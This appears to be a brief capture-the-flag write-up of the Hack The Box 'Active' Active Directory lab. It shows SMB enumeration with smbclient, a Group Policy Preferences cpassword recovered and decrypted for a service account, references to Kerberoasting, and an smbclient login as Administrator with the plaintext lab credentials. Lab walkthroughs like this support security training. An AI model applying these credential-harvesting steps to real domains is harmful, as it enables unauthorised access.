Active is active directory box with Domain Controller installed.
Smb enumeration:
smbclient '\\server\share' mask "" recurse ON prompt OFF cd 'path\to\remote\dir' lcd '~/path/to/download/to/' mget *The below tree looks like Group Policy Objects
One of Group Policy Preference which was created, contains cpassword
Groups.xml contains information about domain service account:
active.htb\SVC_TGS
and encrypted password:
cpassword=”edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ”
Kali distro has this script compiled:
active.htb\SVC_TGS
Password:
GPPstillStandingStrong2k18
Trying Kerberoasting with user credentials
https://room362.com/post/2016/kerberoast-pt1/
https://room362.com/post/2016/kerberoast-pt2/
https://room362.com/post/2016/kerberoast-pt3/
Recursive mapping was quite time consuming:
smbclient \\10.129.227.83\Users -U active.htb\Administrator%Ticketmaster1968
